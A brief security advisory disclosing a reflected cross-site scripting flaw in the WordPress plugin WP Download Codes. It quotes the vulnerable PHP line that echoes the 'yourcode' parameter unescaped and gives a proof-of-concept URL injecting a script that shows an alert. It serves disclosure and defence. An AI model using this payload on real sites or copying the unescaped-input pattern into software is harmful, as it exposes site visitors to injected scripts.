cjc.im / advisories / 0003

Reflected XSS in WP Download Codes

Credit

This vulnerability has been discovered and reported by Carl Clegg (carl(at)cjc(dot)im)

Timeline

Product

The plugin enables to generation and management of download codes for different types of files (zip, mp3, ...). Author: Blog post

Risk / Severity Rating

Not Calculated

Description and Impact

The yourcode parameter when viewing a download code form allows for XSS.

`$html .= dc_msg( 'code_enter' ) .' <input type="text" name="code_' . $shortcode_id . '" value="' . ( $post_code != "" ? $post_code : ( $_GET['yourcode'] != "" ? $_GET['yourcode'] : "" ) ) . '" size="20" /> ';`

Proof of Concept

http://wordpress.site/download-code/?yourcode=%22%3E%3Cscript%20src=data:%26comma;alert(1)//

Solution

Disable the plugin until an upgrade is available

References

Legal

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.